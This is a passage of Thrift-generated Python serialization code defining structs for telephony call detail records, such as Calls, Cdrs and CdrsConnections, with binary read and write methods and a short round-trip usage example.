if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('NullInt64')
if self.v is not None:
oprot.writeFieldBegin('v', TType.I64, 1)
oprot.writeI64(self.v)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class NullString(object):
"""
Attributes:
- s
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 's', 'UTF8', None, ), # 1
)
def __init__(self, s=None,):
self.s = s
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.s = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('NullString')
if self.s is not None:
oprot.writeFieldBegin('s', TType.STRING, 1)
oprot.writeString(self.s.encode('utf-8') if sys.version_info[0] == 2 else self.s)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class UnixTime(object):
"""
Attributes:
- seconds
- nanoseconds
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'seconds', None, None, ), # 1
(2, TType.I64, 'nanoseconds', None, None, ), # 2
)
def __init__(self, seconds=None, nanoseconds=None,):
self.seconds = seconds
self.nanoseconds = nanoseconds
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.seconds = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.nanoseconds = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UnixTime')
if self.seconds is not None:
oprot.writeFieldBegin('seconds', TType.I64, 1)
oprot.writeI64(self.seconds)
oprot.writeFieldEnd()
if self.nanoseconds is not None:
oprot.writeFieldBegin('nanoseconds', TType.I64, 2)
oprot.writeI64(self.nanoseconds)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class MonoTime(object):
"""
Attributes:
- monot
- realt
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'monot', (UnixTime, UnixTime.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'realt', (UnixTime, UnixTime.thrift_spec), None, ), # 2
)
def __init__(self, monot=None, realt=None,):
self.monot = monot
self.realt = realt
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.monot = UnixTime()
self.monot.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.realt = UnixTime()
self.realt.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('MonoTime')
if self.monot is not None:
oprot.writeFieldBegin('monot', TType.STRUCT, 1)
self.monot.write(oprot)
oprot.writeFieldEnd()
if self.realt is not None:
oprot.writeFieldBegin('realt', TType.STRUCT, 2)
self.realt.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TransactionRecord(object):
"""
Attributes:
- type
- data
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'type', None, None, ), # 1
(2, TType.STRING, 'data', 'UTF8', None, ), # 2
)
def __init__(self, type=None, data=None,):
self.type = type
self.data = data
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.type = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.data = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TransactionRecord')
if self.type is not None:
oprot.writeFieldBegin('type', TType.I32, 1)
oprot.writeI32(self.type)
oprot.writeFieldEnd()
if self.data is not None:
oprot.writeFieldBegin('data', TType.STRING, 2)
oprot.writeString(self.data.encode('utf-8') if sys.version_info[0] == 2 else self.data)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Transaction(object):
"""
Attributes:
- records
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'records', (TType.STRUCT, (TransactionRecord, TransactionRecord.thrift_spec), False), None, ), # 1
)
def __init__(self, records=None,):
self.records = records
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.records = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = TransactionRecord()
_elem5.read(iprot)
self.records.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Transaction')
if self.records is not None:
oprot.writeFieldBegin('records', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.records))
for iter6 in self.records:
iter6.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Calls(object):
"""
Attributes:
- i_call
- call_id
- cld
- cli
- setup_time
- parent_i_call
- i_call_type
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_call', None, None, ), # 1
(2, TType.STRING, 'call_id', 'UTF8', None, ), # 2
(3, TType.STRING, 'cld', 'UTF8', None, ), # 3
(4, TType.STRING, 'cli', 'UTF8', None, ), # 4
(5, TType.I64, 'setup_time', None, None, ), # 5
(6, TType.STRUCT, 'parent_i_call', (NullInt64, NullInt64.thrift_spec), None, ), # 6
(7, TType.STRUCT, 'i_call_type', (NullInt64, NullInt64.thrift_spec), None, ), # 7
)
def __init__(self, i_call=None, call_id=None, cld=None, cli=None, setup_time=None, parent_i_call=None, i_call_type=None,):
self.i_call = i_call
self.call_id = call_id
self.cld = cld
self.cli = cli
self.setup_time = setup_time
self.parent_i_call = parent_i_call
self.i_call_type = i_call_type
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.call_id = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.cld = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.cli = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.parent_i_call = NullInt64()
self.parent_i_call.read(iprot)
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRUCT:
self.i_call_type = NullInt64()
self.i_call_type.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Calls')
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 1)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.call_id is not None:
oprot.writeFieldBegin('call_id', TType.STRING, 2)
oprot.writeString(self.call_id.encode('utf-8') if sys.version_info[0] == 2 else self.call_id)
oprot.writeFieldEnd()
if self.cld is not None:
oprot.writeFieldBegin('cld', TType.STRING, 3)
oprot.writeString(self.cld.encode('utf-8') if sys.version_info[0] == 2 else self.cld)
oprot.writeFieldEnd()
if self.cli is not None:
oprot.writeFieldBegin('cli', TType.STRING, 4)
oprot.writeString(self.cli.encode('utf-8') if sys.version_info[0] == 2 else self.cli)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 5)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.parent_i_call is not None:
oprot.writeFieldBegin('parent_i_call', TType.STRUCT, 6)
self.parent_i_call.write(oprot)
oprot.writeFieldEnd()
if self.i_call_type is not None:
oprot.writeFieldBegin('i_call_type', TType.STRUCT, 7)
self.i_call_type.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Cdrs(object):
"""
Attributes:
- i_cdr
- i_call
- i_account
- result
- cost
- delay
- duration
- billed_duration
- connect_time
- disconnect_time
- cld_in
- cli_in
- prefix
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- remote_ip
- grace_period
- user_agent
- pdd1xx
- i_protocol
- release_source
- plan_duration
- accessibility_cost
- lrn_cld
- lrn_cld_in
- area_name
- p_asserted_id
- remote_party_id
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdr', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_account', None, None, ), # 3
(4, TType.I64, 'result', None, None, ), # 4
(5, TType.DOUBLE, 'cost', None, None, ), # 5
(6, TType.DOUBLE, 'delay', None, None, ), # 6
(7, TType.DOUBLE, 'duration', None, None, ), # 7
(8, TType.DOUBLE, 'billed_duration', None, None, ), # 8
(9, TType.I64, 'connect_time', None, None, ), # 9
(10, TType.I64, 'disconnect_time', None, None, ), # 10
(11, TType.STRING, 'cld_in', 'UTF8', None, ), # 11
(12, TType.STRING, 'cli_in', 'UTF8', None, ), # 12
(13, TType.STRING, 'prefix', 'UTF8', None, ), # 13
(14, TType.DOUBLE, 'price_1', None, None, ), # 14
(15, TType.DOUBLE, 'price_n', None, None, ), # 15
(16, TType.I32, 'interval_1', None, None, ), # 16
(17, TType.I32, 'interval_n', None, None, ), # 17
(18, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 18
(19, TType.DOUBLE, 'connect_fee', None, None, ), # 19
(20, TType.I64, 'free_seconds', None, None, ), # 20
(21, TType.STRING, 'remote_ip', 'UTF8', None, ), # 21
(22, TType.I32, 'grace_period', None, None, ), # 22
(23, TType.STRING, 'user_agent', 'UTF8', None, ), # 23
(24, TType.DOUBLE, 'pdd1xx', None, None, ), # 24
(25, TType.I16, 'i_protocol', None, None, ), # 25
(26, TType.STRING, 'release_source', 'UTF8', None, ), # 26
(27, TType.DOUBLE, 'plan_duration', None, None, ), # 27
(28, TType.DOUBLE, 'accessibility_cost', None, None, ), # 28
(29, TType.STRUCT, 'lrn_cld', (NullString, NullString.thrift_spec), None, ), # 29
(30, TType.STRUCT, 'lrn_cld_in', (NullString, NullString.thrift_spec), None, ), # 30
(31, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 31
(32, TType.STRUCT, 'p_asserted_id', (NullString, NullString.thrift_spec), None, ), # 32
(33, TType.STRUCT, 'remote_party_id', (NullString, NullString.thrift_spec), None, ), # 33
)
def __init__(self, i_cdr=None, i_call=None, i_account=None, result=None, cost=None, delay=None, duration=None, billed_duration=None, connect_time=None, disconnect_time=None, cld_in=None, cli_in=None, prefix=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, remote_ip=None, grace_period=None, user_agent=None, pdd1xx=None, i_protocol=None, release_source=None, plan_duration=None, accessibility_cost=None, lrn_cld=None, lrn_cld_in=None, area_name=None, p_asserted_id=None, remote_party_id=None,):
self.i_cdr = i_cdr
self.i_call = i_call
self.i_account = i_account
self.result = result
self.cost = cost
self.delay = delay
self.duration = duration
self.billed_duration = billed_duration
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.cld_in = cld_in
self.cli_in = cli_in
self.prefix = prefix
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.remote_ip = remote_ip
self.grace_period = grace_period
self.user_agent = user_agent
self.pdd1xx = pdd1xx
self.i_protocol = i_protocol
self.release_source = release_source
self.plan_duration = plan_duration
self.accessibility_cost = accessibility_cost
self.lrn_cld = lrn_cld
self.lrn_cld_in = lrn_cld_in
self.area_name = area_name
self.p_asserted_id = p_asserted_id
self.remote_party_id = remote_party_id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdr = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_account = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.result = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.delay = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.STRING:
self.cld_in = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.STRING:
self.cli_in = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.I64:
self.free_seconds = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 21:
if ftype == TType.STRING:
self.remote_ip = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 22:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 23:
if ftype == TType.STRING:
self.user_agent = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 24:
if ftype == TType.DOUBLE:
self.pdd1xx = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 25:
if ftype == TType.I16:
self.i_protocol = iprot.readI16()
else:
iprot.skip(ftype)
elif fid == 26:
if ftype == TType.STRING:
self.release_source = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 27:
if ftype == TType.DOUBLE:
self.plan_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 28:
if ftype == TType.DOUBLE:
self.accessibility_cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 29:
if ftype == TType.STRUCT:
self.lrn_cld = NullString()
self.lrn_cld.read(iprot)
else:
iprot.skip(ftype)
elif fid == 30:
if ftype == TType.STRUCT:
self.lrn_cld_in = NullString()
self.lrn_cld_in.read(iprot)
else:
iprot.skip(ftype)
elif fid == 31:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 32:
if ftype == TType.STRUCT:
self.p_asserted_id = NullString()
self.p_asserted_id.read(iprot)
else:
iprot.skip(ftype)
elif fid == 33:
if ftype == TType.STRUCT:
self.remote_party_id = NullString()
self.remote_party_id.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Cdrs')
if self.i_cdr is not None:
oprot.writeFieldBegin('i_cdr', TType.I64, 1)
oprot.writeI64(self.i_cdr)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_account is not None:
oprot.writeFieldBegin('i_account', TType.I64, 3)
oprot.writeI64(self.i_account)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I64, 4)
oprot.writeI64(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 5)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.delay is not None:
oprot.writeFieldBegin('delay', TType.DOUBLE, 6)
oprot.writeDouble(self.delay)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 7)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 8)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 9)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 10)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.cld_in is not None:
oprot.writeFieldBegin('cld_in', TType.STRING, 11)
oprot.writeString(self.cld_in.encode('utf-8') if sys.version_info[0] == 2 else self.cld_in)
oprot.writeFieldEnd()
if self.cli_in is not None:
oprot.writeFieldBegin('cli_in', TType.STRING, 12)
oprot.writeString(self.cli_in.encode('utf-8') if sys.version_info[0] == 2 else self.cli_in)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 13)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 14)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 15)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 16)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 17)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 18)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 19)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I64, 20)
oprot.writeI64(self.free_seconds)
oprot.writeFieldEnd()
if self.remote_ip is not None:
oprot.writeFieldBegin('remote_ip', TType.STRING, 21)
oprot.writeString(self.remote_ip.encode('utf-8') if sys.version_info[0] == 2 else self.remote_ip)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 22)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.user_agent is not None:
oprot.writeFieldBegin('user_agent', TType.STRING, 23)
oprot.writeString(self.user_agent.encode('utf-8') if sys.version_info[0] == 2 else self.user_agent)
oprot.writeFieldEnd()
if self.pdd1xx is not None:
oprot.writeFieldBegin('pdd1xx', TType.DOUBLE, 24)
oprot.writeDouble(self.pdd1xx)
oprot.writeFieldEnd()
if self.i_protocol is not None:
oprot.writeFieldBegin('i_protocol', TType.I16, 25)
oprot.writeI16(self.i_protocol)
oprot.writeFieldEnd()
if self.release_source is not None:
oprot.writeFieldBegin('release_source', TType.STRING, 26)
oprot.writeString(self.release_source.encode('utf-8') if sys.version_info[0] == 2 else self.release_source)
oprot.writeFieldEnd()
if self.plan_duration is not None:
oprot.writeFieldBegin('plan_duration', TType.DOUBLE, 27)
oprot.writeDouble(self.plan_duration)
oprot.writeFieldEnd()
if self.accessibility_cost is not None:
oprot.writeFieldBegin('accessibility_cost', TType.DOUBLE, 28)
oprot.writeDouble(self.accessibility_cost)
oprot.writeFieldEnd()
if self.lrn_cld is not None:
oprot.writeFieldBegin('lrn_cld', TType.STRUCT, 29)
self.lrn_cld.write(oprot)
oprot.writeFieldEnd()
if self.lrn_cld_in is not None:
oprot.writeFieldBegin('lrn_cld_in', TType.STRUCT, 30)
self.lrn_cld_in.write(oprot)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 31)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.p_asserted_id is not None:
oprot.writeFieldBegin('p_asserted_id', TType.STRUCT, 32)
self.p_asserted_id.write(oprot)
oprot.writeFieldEnd()
if self.remote_party_id is not None:
oprot.writeFieldBegin('remote_party_id', TType.STRUCT, 33)
self.remote_party_id.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
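
# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the generated code): a minimal round trip
# that serializes a Cdrs record to bytes with the plain binary protocol and
# parses it back. Field values are illustrative; this assumes the standard
# Apache Thrift Python runtime is installed.
def _example_cdrs_roundtrip():
    from thrift.transport import TTransport
    from thrift.protocol import TBinaryProtocol
    original = Cdrs(i_cdr=1, i_call=2, i_account=3, result=200, cost=0.25)
    out = TTransport.TMemoryBuffer()
    original.write(TBinaryProtocol.TBinaryProtocol(out))
    parsed = Cdrs()
    parsed.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(out.getvalue())))
    assert parsed == original  # __eq__ compares the full attribute dict
    return parsed
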
class CdrsConnections(object):
"""
Attributes:
- i_cdrs_connection
- i_call
- i_connection
- result
- cost
- delay
- duration
- billed_duration
- setup_time
- connect_time
- disconnect_time
- cld_out
- cli_out
- prefix
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
- user_agent
- pdd100
- pdd1xx
- i_account_debug
- i_protocol
- release_source
- call_setup_time
- lrn_cld
- area_name
- i_media_relay
- remote_ip
- vendor_name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_connection', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_connection', None, None, ), # 3
(4, TType.I32, 'result', None, None, ), # 4
(5, TType.DOUBLE, 'cost', None, None, ), # 5
(6, TType.DOUBLE, 'delay', None, None, ), # 6
(7, TType.DOUBLE, 'duration', None, None, ), # 7
(8, TType.DOUBLE, 'billed_duration', None, None, ), # 8
(9, TType.I64, 'setup_time', None, None, ), # 9
